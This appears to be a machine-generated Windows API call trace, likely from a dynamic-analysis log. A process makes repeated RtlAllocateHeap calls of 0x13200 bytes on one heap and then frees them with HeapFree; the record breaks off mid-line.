RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2141bd0 [0258.951] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1f8) returned 0x488910 [0258.951] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b0b0 | out: hHeap=0x470000) returned 1 [0258.951] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2154de0 [0258.951] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2167ff0 [0258.952] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x217b200 [0258.953] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x218e410 [0258.953] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21b0080 [0258.954] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21c3290 [0258.955] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21d64a0 [0258.955] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21e96b0 [0258.956] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x21fc8c0 [0258.957] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x220fad0 [0258.957] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2222ce0 [0258.958] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2235ef0 [0258.958] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2249100 [0258.959] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x225c310 [0258.959] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x226f520 [0258.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2282730 [0258.960] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2295940 [0258.961] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22a8b50 [0258.961] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22bbd60 [0258.962] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22cef70 [0259.065] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22e2180 [0259.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2f0) returned 0x488b10 [0259.066] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0259.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x22f5390 [0259.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23085a0 [0259.067] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x231b7b0 [0259.067] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x232e9c0 [0259.068] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2341bd0 [0259.068] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2354de0 [0259.068] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2367ff0 [0259.069] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x237b200 [0259.069] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x238e410 [0259.069] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23a1620 [0259.070] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23b4830 [0259.070] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23c7a40 [0259.071] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23dac50 [0259.072] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x23ede60 [0259.072] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2401070 [0259.073] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2414280 [0259.073] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2427490 [0259.074] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x243a6a0 [0259.074] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x244d8b0 [0259.075] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2460ac0 [0259.075] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2473cd0 [0259.076] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2486ee0 [0259.076] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x249a0f0 [0259.076] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24ad300 [0259.077] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24c0510 [0259.077] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24d3720 [0259.078] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24e6930 [0259.078] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x24f9b40 [0259.078] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x250cd50 [0259.079] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x251ff60 [0259.079] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2533170 [0259.080] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x468) returned 0x49c5f0 [0259.080] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488b10 | out: hHeap=0x470000) returned 1 [0259.080] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2546380 [0259.080] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2559590 [0259.080] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x256c7a0 [0259.081] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x257f9b0 [0259.082] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2592bc0 [0259.082] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25b0080 [0259.083] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25c3290 [0259.084] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25d64a0 [0259.084] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25e96b0 [0259.085] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x25fc8c0 [0259.085] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x260fad0 [0259.086] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2622ce0 [0259.086] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2635ef0 [0259.087] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2649100 [0259.087] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x265c310 [0259.087] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x266f520 [0259.088] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2682730 [0259.088] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2695940 [0259.088] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26a8b50 [0259.089] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26bbd60 [0259.089] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26cef70 [0259.090] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26e2180 [0259.090] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x26f5390 [0259.091] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27085a0 [0259.091] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x271b7b0 [0259.091] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x272e9c0 [0259.092] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2741bd0 [0259.092] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2754de0 [0259.092] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2767ff0 [0259.093] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x277b200 [0259.093] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x278e410 [0259.094] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27a1620 [0259.094] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27b4830 [0259.095] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27c7a40 [0259.095] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27dac50 [0259.096] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x27ede60 [0259.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2801070 [0259.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2814280 [0259.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2827490 [0259.098] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x283a6a0 [0259.098] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x284d8b0 [0259.099] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2860ac0 [0259.100] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2873cd0 [0259.209] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2886ee0 [0259.209] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x289a0f0 [0259.210] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28ad300 [0259.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28c0510 [0259.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x698) returned 0x488910 [0259.212] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49c5f0 | out: hHeap=0x470000) returned 1 [0259.212] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28d3720 [0259.213] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28e6930 [0259.214] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x28f9b40 [0259.214] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x290cd50 [0259.214] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x291ff60 [0259.215] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2933170 [0259.215] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2946380 [0259.216] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2959590 [0259.216] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x296c7a0 [0259.217] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x297f9b0 [0259.217] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2992bc0 [0259.218] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29a5dd0 [0259.218] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29b8fe0 [0259.219] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29cc1f0 [0259.219] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29df400 [0259.220] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x29f2610 [0259.221] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a05820 [0259.221] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a18a30 [0259.222] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a2bc40 [0259.222] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a3ee50 [0259.223] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a52060 [0259.224] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a65270 [0259.224] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a78480 [0259.225] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a8b690 [0259.225] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2a9e8a0 [0259.226] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ab1ab0 [0259.226] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ac4cc0 [0259.226] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ad7ed0 [0259.227] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2aeb0e0 [0259.228] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2afe2f0 [0259.228] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b11500 [0259.229] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b24710 [0259.229] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b37920 [0259.230] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b4ab30 [0259.231] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b5dd40 [0259.231] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b70f50 [0259.232] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b84160 [0259.233] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2b97370 [0259.233] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2baa580 [0259.234] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2bbd790 [0259.235] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2bd09a0 [0259.235] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2be3bb0 [0259.236] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2bf6dc0 [0259.236] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c09fd0 [0259.237] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c1d1e0 [0259.237] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c303f0 [0259.238] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c43600 [0259.238] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c56810 [0259.239] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c69a20 [0259.239] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c7cc30 [0259.239] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2c8fe40 [0259.240] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ca3050 [0259.241] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cb6260 [0259.241] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cc9470 [0259.242] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cdc680 [0259.242] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2cef890 [0259.244] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d02aa0 [0259.245] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d15cb0 [0259.357] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d28ec0 [0259.358] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d3c0d0 [0259.359] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d4f2e0 [0259.359] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d624f0 [0259.360] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d75700 [0259.360] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2d88910 [0259.361] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2db0080 [0259.363] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2dc3290 [0259.364] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2dd64a0 [0259.364] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2de96b0 [0259.365] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2dfc8c0 [0259.366] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e0fad0 [0259.366] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9e0) returned 0x49c5f0 [0259.366] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x488910 | out: hHeap=0x470000) returned 1 [0259.366] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e22ce0 [0259.367] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e35ef0 [0259.367] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e49100 [0259.368] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e5c310 [0259.369] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e6f520 [0259.369] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e82730 [0259.370] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2e95940 [0259.370] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ea8b50 [0259.371] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ebbd60 [0259.372] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ecef70 [0259.372] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ee2180 [0259.373] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2ef5390 [0259.373] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f085a0 [0259.374] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f1b7b0 [0259.376] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x13200) returned 0x2f2e9c0 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a7480 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c7280 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4da490 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ed6a0 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x5008b0 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x513ac0 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x526cd0 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x539ee0 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54d0f0 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1e50080 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1e63290 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1e764a0 | out: hHeap=0x470000) returned 1 [0264.525] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1e896b0 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1e9c8c0 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1eafad0 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1ec2ce0 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1ed5ef0 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1ee9100 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1efc310 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f0f520 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1f22730 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fb0080 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fc3290 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fd64a0 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1fe96b0 | out: hHeap=0x470000) returned 1 [0264.526] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x1ffc8c0 | out: hHeap=0x470000) returned 1 [0264.537] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x200fad0 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2022ce0 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2035ef0 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2049100 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x205c310 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x206f520 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2082730 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2095940 | out: hHeap=0x470000) returned 1 [0264.538] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20a8b50 | out: hHeap=0x470000) returned 1 [0264.541] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20bbd60 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20cef70 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20e2180 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x20f5390 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21085a0 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x211b7b0 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x212e9c0 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2141bd0 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2154de0 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2167ff0 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x217b200 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x218e410 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21b0080 | out: hHeap=0x470000) returned 1 [0264.542] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21c3290 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21d64a0 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21e96b0 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x21fc8c0 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x220fad0 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2222ce0 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2235ef0 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2249100 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x225c310 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x226f520 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2282730 | out: hHeap=0x470000) returned 1 [0264.548] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x2295940 | out: hHeap=0x470000) returned 1 [0264.549] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22a8b50 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22bbd60 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22cef70 | out: hHeap=0x470000) returned 1 [0264.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x22e2180 | out: hHeap=0x470000) returned 